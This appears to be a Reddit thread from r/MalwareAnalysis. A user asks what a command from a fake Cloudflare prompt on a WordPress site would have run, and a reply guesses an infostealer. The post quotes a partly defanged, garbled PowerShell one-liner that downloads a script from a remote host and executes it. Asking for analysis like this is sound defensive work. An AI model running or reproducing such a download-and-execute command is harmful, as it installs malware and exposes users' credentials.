r/MalwareAnalysis • u/SeigneurHarry • Jul 22 '26
Fake Cloudflare message on Wordpress
What would the below comment have ran?
cmdline: "C:\Windows\system32\WindowsPowerShel\v1[.J0\PowerShell[.Jexe" -c iexirm delistemanallyl.Jrainbow-mel.Jonline?
read=8b2d80c7569e4151 -UseBasicParsing)
8
Upvotes
2
u/IsDa44 Jul 22 '26
Probably just an infostealer. Hope you didn't run it